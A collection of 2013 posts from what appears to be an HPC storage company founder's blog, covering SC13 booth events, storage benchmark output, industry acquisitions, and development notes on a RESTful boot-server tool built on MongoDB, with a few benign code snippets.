We have the fastest, densest systems in market. Our usable performance far outpaces our nearest competitors’ configurations, which are not in a reasonable config (hello … 60+ raw JBOD? or RAID0 … seriously? And no one has challenged them on this?)
Our partners rocked.
Posts
SC13: Day 2 wrap up
Day 1 was incredible. Day 2 topped day 1 by a fair amount. I had realized yesterday that I had forgotten to put up our speedometer website which pulled data directly from the siFlash hardware on the real IO performance. I had this unit running hard, and the IO operations were moving quite well. So I put up the web page on my laptop, and this is what we saw: 30GB/s.
Posts
An apology
When I mess up, I don’t normally do it in a small way. I jump in hard, head first. I made an assumption about something I did not have all the facts about today, and began to tear into someone who did not deserve this treatment, after making him wait for me at our booth. Yeah, this was a major screw up on my part. Addison, I hope you will forgive me, and accept my humble apology.
Posts
SC13 day 1 wrap up
A good day at the booth. The talks were well attended, and speakers and their topics were interesting. Our partners in the booth: Kx, Veristorm, Basement Supercomputing, Sandisk, XtremeData, and Inktank are phenomenal. We announced many new products, all on display at our booth, and the partners working with us on these products were there to talk about the applications. What we didn’t show off were the speedometers measuring the performance live on the systems.
Posts
Interesting article
I read this on Gigaom. In it, there is a claim of the densest storage on the market coming from Quanta, and a full rack of them would be about 3/4 ton (about 682 kg). Amazon uses a “special” design that comes in more than a ton according to the article. So I decided to look into what a simple 42U rack of say 10 of our bad boys would come out with weight wise.
Posts
Broken APIs and other time wasters
So I spent the day trying to figure out why my simple form submission which then generated an XML output, and then a subsequent post to Zoho CRM, did not, in fact, work. I was doing this without the Zoho code, just a description of their API. It’s an older API, that much is obvious. You talk to it through XML. You post your XML. But you put parameters on the URI to control the post.
Posts
Sneak peek at UI atop RESTful API
This is our new, common UI across all machines, clusters, clouds, appliances, tiburon/Scalable OS … This one in particular is running atop our siRouter. More on that soon, but have a little gander.
[ ](/images/SOS-v1.png)
The UI is basically a “thin” layer atop the RESTful interface. And it’s a proper RESTful interface, none of this conflated GET where we mean POST/PUT and all that. More at SC13. I promise.
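For readers wondering what "proper" means here, a rough sketch of verbs keeping their conventional meanings follows. This is an illustrative in-memory toy with made-up names (`store`, `handle`), not the code behind the UI above.

```python
import itertools

# Hypothetical in-memory resource store, for illustration only.
store = {}
_ids = itertools.count(1)


def handle(method, key, payload=None):
    """Dispatch on the HTTP verb so each one keeps its usual meaning."""
    if method == "GET":       # read only, never changes state
        return (200, store[key]) if key in store else (404, None)
    if method == "POST":      # create under a collection; the server picks the id
        new_key = f"{key}/{next(_ids)}"
        store[new_key] = payload
        return (201, new_key)
    if method == "PUT":       # create or replace at a known key (idempotent)
        created = key not in store
        store[key] = payload
        return (201 if created else 200, payload)
    if method == "DELETE":    # remove; repeating it does no further harm
        if key in store:
            del store[key]
            return (204, None)
        return (404, None)
    return (405, None)        # verb not supported for this resource
```

The point of the split is that a GET can be retried or cached without side effects, while anything that changes state has to go through POST, PUT, or DELETE.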
Posts
kvm incompatible with xfs
Just found this out by way of an experiment for a partner. Cool partner, cool product, running on our fast hardware for SC13. Problem is that I was seeing some very odd error messages when I tried to mount a volume stored in a file on an xfs based LUN. I could dd to the file. I could mkfs.ext* the /dev/vda. But the moment I tried to mount it, block errors.
Posts
BeoBash13: the revenge of the rampaging physics-turned-supercomputer geeks?
Or something like that. See here. We’ll be there!
Posts
SC13 T-14 days
We will be at booth 1919. Please do come by and say hello. We’ll have coffee/tea (I think), a number of machines, great partners with a number of demos, and hopefully some talks on big data analytics in Financial Services, Parallel high performance databases, massive key-value storage and processing, as well as a few other bits. We’ll have a very cool box from one of our friends in the booth. We ship the machines at the end of this week, or beginning of next.
Posts
And then they fight you
We’ve been championing the tightly coupled storage and computing model for a long time. When it was unfashionable, when it was discarded as “this is something you should not do” by others “who knew better”. Now, the ideas, the concepts, the thoughts, the designs and implementations behind it are all around. Joyent’s Manta system is an implementation of the concept. Arguably, the more advanced MapReduce and Hadoop designs are also implementations … have the data right next to the processing, and provide gargantuan bandwidth locally to the data.
Posts
Cray acquires the IP assets and people of Gnodal
We used Gnodal units for the original Lucera system. Very nice devices with a few idiosyncrasies. Gnodal ran into some funding problems earlier this year, and had to find a buyer. Cray grabbed them and a number of the people involved. This is good for Gnodal and Cray. Gnodal has interesting technology. And Cray may be looking at how to leverage SDN for its system using this (wild guess on my part, I have no knowledge direct or indirect of their plans/intentions/…).
Posts
First distributed file system for STAC M3 benchmarks
We ran the STAC M3 on a Ceph based storage cloud appliance you will be hearing more about soon. The report should be up on the STAC site later this week. Here are some of the take-aways:
We chose Ceph for several reasons, but you should expect to see others very soon as well. Our Cluster and Cloud storage appliances are based upon our very powerful and very dense building blocks.
Posts
At the STAC Summit in NYC, presenting our Time Series Analytics Appliance
This was a good meeting in general. Lively panelists, focused panels, though somewhat vendor heavy in a number of cases. I have a sense of a “Gandhi” experience in progress from the parallel file systems panel. 4 vendors, one user. The user was fantastic, and the vendors were pushing most of their own stuff. One vendor in particular took some not too thinly veiled shots directly at us without naming us.
Posts
But, of course
So I ran out of space on my travel laptop’s small SSD. I wanted to update to a larger SSD, and I figured I’d move my partitions over and resize. But the gods would not allow for such an operation as they have in the past. Oh no. Upon switching out the 120 GB Intel SSD for the 240 GB SSD (spare unit we had), and putting the 120 GB SSD into a USB 3 holder, I discovered that a) the drive wouldn’t register with the machine most of the time (it errored out during SCSI plugin detection), or b) when it did detect properly, it wouldn’t provide partitions I could copy off.
Posts
Our little time series analytical appliance is one fast monster
Running some burn in testing:
Run status group 0 (all jobs):
READ: io=523296MB, aggrb=12093MB/s, minb=12093MB/s, maxb=12093MB/s, mint=43274msec, maxt=43274msec
WRITE: io=523296MB, aggrb=7469.4MB/s, minb=7469.4MB/s, maxb=7469.4MB/s, mint=70059msec, maxt=70059msec
More soon
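The aggregate bandwidth figures can be sanity-checked from the `io` and `mint`/`maxt` values in the same output: bandwidth is simply data moved divided by runtime. A small sketch, with a helper name of my own choosing; expect small rounding differences against what the tool prints.

```python
def aggregate_mb_per_s(io_mb, runtime_msec):
    """Aggregate bandwidth in MB/s from total MB moved and runtime in milliseconds."""
    return io_mb / (runtime_msec / 1000.0)


# Values copied from the run status lines above.
read_bw = aggregate_mb_per_s(523296, 43274)
write_bw = aggregate_mb_per_s(523296, 70059)

print(f"read  ~ {read_bw:.0f} MB/s")
print(f"write ~ {write_bw:.0f} MB/s")
```

Both results land within a fraction of a percent of the reported `aggrb` values, roughly 12 GB/s for reads and 7.5 GB/s for writes.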
Posts
This week past has been (mostly) incredible
Feeling not happy about my time away from my family, and not happy about Vipin’s time away from his, we still accomplished a great deal. Some unhappy things I still have to deal with, and I will soon. But this has been a great week. Look for some announcements around the SC13 show. We will have some nice things to talk about at our booth (#1919, please do come and visit us there, we will have coffee, snacks, as well as our team, partners, and friends there!)
Posts
And the benchmarks are out
Check out the official site for more info. Take home messages for the soon to be announced system
and
What is this magical beast you ask? What are its configuration limits? You’ll have to wait for the official unveiling.
Posts
New benchmark results imminent
Will update once they are released. I can’t tell you numbers within. I can say that we are quite happy with the results. More (very) soon. I promise.
Posts
Heh ...
[ ](http://www.businessinsider.com/scott-adams-favorite-dilbert-comics-2013-10)
Posts
This would be funny if it weren't sad
Over on the pfSense mailing list there is a serious level of tin-foil-hat (TFH) and rampant paranoia, coupled with extreme lack of etiquette on the part of the TFH brigade. And, to make it more enjoyable, at least one overt and humorous case of attempted cyber bullying against me personally for imploring people to stop hijacking a technical discussion list, as well as people decrying a faux oppression from people who genuinely want the list to return to its technical roots.
Posts
Starting to build the Tiburon Data Store
This is fun, basically something that I’ve wanted to do, and it gets me closer to the point where I’ve wanted to be for a while … building TREDS (Tiburon REliable Data Store). Code is up in the IDE, and I am building the CRUD and metadata portions now. If all goes well (it never does), we should be storing/retrieving objects soon. Very exciting …
Posts
More benchmarking goodness coming
A new round of industry standard benchmarks coming soon for some of our kit. Well, it’s technically our appliance built from that platform, but you’ll be hearing more on that soon. Very exciting times … you’ll hear more about this soon.
Posts
Moving more of our infrastructure to our dog food ...
Many of our functions are hosted on our Virtualization appliance. Our firewall is now running on a siRouter appliance. As always, our internal storage is JackRabbit, and our internal backup is DeltaV. We’ll be talking more about all of this in short order. Needless to say, I am quite pleased about this. [update] spoke too soon .. discovered a routing failure that was masked in the appliance. Reverting to the old setup until we can address.
Posts
Wonderful changes in Tiburon-RESTful
I’ve been rewriting Tiburon to provide a completely sane restful interface. It still does what it did before, but now … it does it so much more nicely! First: I got rid of the config file. Some folks were having trouble with JSON config files. Creating them is very easy, they are key value stores in 90% of the cases, with the remaining 10% being a “default” key, and then the value.
Posts
RESTful tiburon tagged
as Alaskan Malamute v0.10. I’m a dog guy, what can I say. Hopefully full boot server semantics will be done by end of weekend.
Posts
Starting to really enjoy using MongoDB as a document store
There are a few gotchas that I am working through. But apart from these (mostly oddities in the interface between Perl and MongoDB), this is making Tiburon RESTful development go much better. I’ve just started to scratch the surface of what the combined thing will do.
landman@lightning:~/work/development/tiburon/t$ ./version.pl
result = $VAR1 = '{ "version" : "0.1", "label" : "Alaskan Malamute" }';
and
landman@lightning:~/work/development/tiburon/t$ ./list_boot_servers.pl
result = $VAR1 = ' [ { "hostport" : "3001", "_id" : "523d540e9745f48429000000", "name" : "test1", "default" : "false", "hostname" : "10.
Posts
Ahhh ... the joy that is being used as a 2 by 4
I didn’t quite see this one in all its glory, but had an inkling that things were not as they appeared to be. Annoying, but one lives, learns, and continues. No details.
Posts
... and Nirvanix shutters ...
Traction, paying customers, revenue and cashflow are what matter to small businesses looking to grow up. In many ways we (the day job) were lucky as we built a sustainable business first, with real customers and real revenue. Most startups don’t do that. They have a change the world idea, and then try to evangelize this whilst building a business. Sometimes they have to “pivot” or … change focus to an idea that will work at turning into a business.
Posts
World’s first low latency cloud
PR from the day job. Remember I’ve been dying to tell people about the ultra cool project we’ve been working on for the last year? Well, this is it. More soon, but I am thrilled we can talk about it now!
Posts
Why is Java used in teaching programming in high schools?
Seriously … My daughter is taking a computer class, and for reasons I cannot fathom, they are using an AP Java book (an old one at that, written when Java 5 was new), and more importantly and more concerningly, the Java language itself. I’ve got many qualms about using Java for teaching (or development, but that’s for other posts). For new students, early exposure to its rigid and verbose … one might argue … excessively verbose … syntax and structure doesn’t quite lend itself to an understanding of how algorithms and computers work.
Posts
Slight annoyance with argument processing
Tiburon as a service. I’ll talk about this at some point, and describe what I mean, but I have to say that I’ve been blown away by the response to it from many places and customers. I’ve been working on making the API restful, and finally … finally … incorporating a noSQL DB on the back end to make the replication and other bits trivial. We are using MongoDB for this.
Posts
Bitten by VirtualBox yet again, moving to kvm
I like VirtualBox. Have for a long time. But it has some … well … interesting failure modes. Including some that have locked up my host machine. The problem for me is that I’ve got my Windows desktop environment for my normal desktop hosted there. And I need this every now and then. Today was the final straw. Working on a document about some of our updates in Word. I don’t like Word, but some of our partners use it, and it’s easier to use it than to fight the battle convincing them to use LibreOffice.
Posts
More M&A
Two items.
Our friends at Virident are now part of WD. I am happy Kumar, Yatin and crew got a nice exit. I am not thrilled at where they landed. Virident joins STEC at WD. But as with STEC, this looks to be on the HGST side of things, which appears to still be building separate and quality product. We will buy and ship HGST. Whiptail was acquired by Cisco.
Posts
Special at the party after HPC on Wall Street
The world’s first low latency drink to go with the next generation low latency cloud … the Scalable low latentini. Yes, it’s real …
Posts
Definitely having one of those days
Massive frustration on multiple fronts, and a few unwelcome surprises. I wish I had karate tonight, and fight night in particular. Lots to work off. I’ll have to be satisfied with weight training tomorrow, and a nice long dog walk tonight.
Posts
More M&A: Microsoft buys Nokia
This one was almost obvious, it was simply a matter of “when”. Microsoft is trying to put some wood behind its Mobile OS arrow. No one seems to want it, save for the 41MP camera “phone”. In the big picture, Microsoft saw the beginning of an erosion of its market power recently, as more people opted for mobile platforms, and fewer opted for PCs and laptops. There is a convenience and cost play going on at the same time.
Posts
Latest DeltaV benchmarks
24 bay system, big RAID6. Reads/write 4x RAM size.
[root@dv4-3 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md2 55T 65G 55T 1% /data ... WRITE: io=65505MB, aggrb=1580.2MB/s, minb=1580.2MB/s, maxb=1580.2MB/s, mint=41433msec, maxt=41433msec READ: io=65505MB, aggrb=2429.4MB/s, minb=2429.4MB/s, maxb=2429.4MB/s, mint=26964msec, maxt=26964msec
Posts
Spot on discussion of a fake crisis
Over at IEEE Spectrum, there is a wonderful article that delves into the latest phase of the alleged massive need for more STEM workers. This is a topic I’ve covered a number of times, here, here, here, and here. TL;DR version for newbies: If someone is trying to sell you on this to get you to decide to go get a STEM degree, then there’s a pretty good probability you are in the process of being deceived.
Posts
Why I've not been posting
Just insanely busy, more so than usual. We are getting close to double digits in employees in the day job. I suspect we’ll cross this in September/October. More news soon, including some wonderful new partners, products, and business bits. I won’t say where at this moment, but you can start searching around for the SI logo on a few folks’ sites …
Posts
Entrepreneurs are optimists
This is something I’ve been meaning to write about for a while. There are many reasons one might decide to be an entrepreneur. For me the journey was fairly simple. In graduate school, I saw the sea change in my field with the influx of FSU scientists with much greater seniority, many more publications, etc. taking up postdoc and tenure track positions around the time I finished up. I knew I had to alter my vision of what I wanted to do in my professional career, and happily SGI came along and gave me the opportunity to spend time in industry.
Posts
Day job at HPC on Wall Street
Ok, this is getting to be a common theme. We go to HPC on Wall Street. We show off new kit. And we are hosting a party. Go figure. There will be more on this very soon. You will see the new kit at our new large booth at SC13. The first element of the new kit is a software defined networking powerhouse behind a new global financial cloud. The group building out the cloud will be there with us, ready to talk to people about what they are doing, and why financial types should sign up for this cloud.
Posts
NextIO shuts its doors and liquidates
As seen here and here.
There are lessons to be learned, and wisdom had from the articles. As the founder noted
Posts
bitten yet again by ancient packages in CentOS (and RHEL)
This is not a CentOS issue in that they merely rebuild the RHEL sources without the copyrighted bits. But it’s getting to the point where the RHEL bits are so badly out of date that the platform is rapidly approaching unusability. When I have to rebuild packages from source, as no up-to-date patched source RPM or even binary RPM exists for little used packages such as, I dunno … apache?
Posts
how not to write driver Makefiles or configuration scripts
if [uname -r eq ...] It’s very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I’ve seen this on network cards, RAID cards, you name it. It increases your support load, decreases the likelihood that you can actually support what’s out there … say for example, someone does a ‘yum update’ and gets an updated kernel.
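One gentler alternative to an exact-match test is to compare against a minimum supported version, so a ‘yum update’ that bumps the kernel does not break the build. A minimal sketch of that idea follows; the function names and the minimum version are assumptions chosen for illustration, not anything from a real driver package.

```python
import re


def kernel_tuple(release):
    """Extract (major, minor, patch) from a `uname -r` style string."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if m is None:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    # A missing patch level is treated as 0.
    return tuple(int(g) if g else 0 for g in m.groups())


def can_build(release, minimum=(2, 6, 32)):  # hypothetical minimum version
    """Accept any kernel at or above the minimum, not one exact release."""
    return kernel_tuple(release) >= minimum


for rel in ("2.6.18-348.el5", "2.6.32-358.el6.x86_64", "3.10.0-123.el7.x86_64"):
    print(rel, "->", "ok" if can_build(rel) else "too old")
```

Better still is to test for the specific kernel feature or header the driver needs, but even a floor instead of an equality check removes most of the pain described above.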
Posts
A cri de coeur for Perl
As seen here. I enjoy developing code in Perl. I know, I know, it’s “the write only language” and “looks like line noise”. It has endured some rather nasty FUD in its day, and yet, it keeps on growing in use. It is just an incredibly powerful, quite expressive language. One which enables you to write very terse code if you wish. But the presentation isn’t concerned with terseness, but with development into a modern programming language.
Posts
The day job is 11 years old
Last year at this time, I had been incensed by a US presidential candidate, and the mindset behind him, who told me and every other entrepreneur out there that “we didn’t build it”. It was a foolish thing for him to say, foolish for his party and fellow travelers to echo. Yet echo it they did. I quietly promised myself to double down on my hard work, the work I did, and see if I could smash the previous year’s smashing financial records.
Posts
and the M&A accelerates
NVidia grabs the Portland Group. This makes sense, as NVidia has had CUDA, which is LLVM based, and needed a more general purpose compiler technology. There is nothing wrong with CUDA, but it’s very GPU specific. PGI tech allows them to talk very generally, and get support for non-GPU hardware acceleration. Such as massive collections of ARM. I expect more M&A and investment activity over the next few months.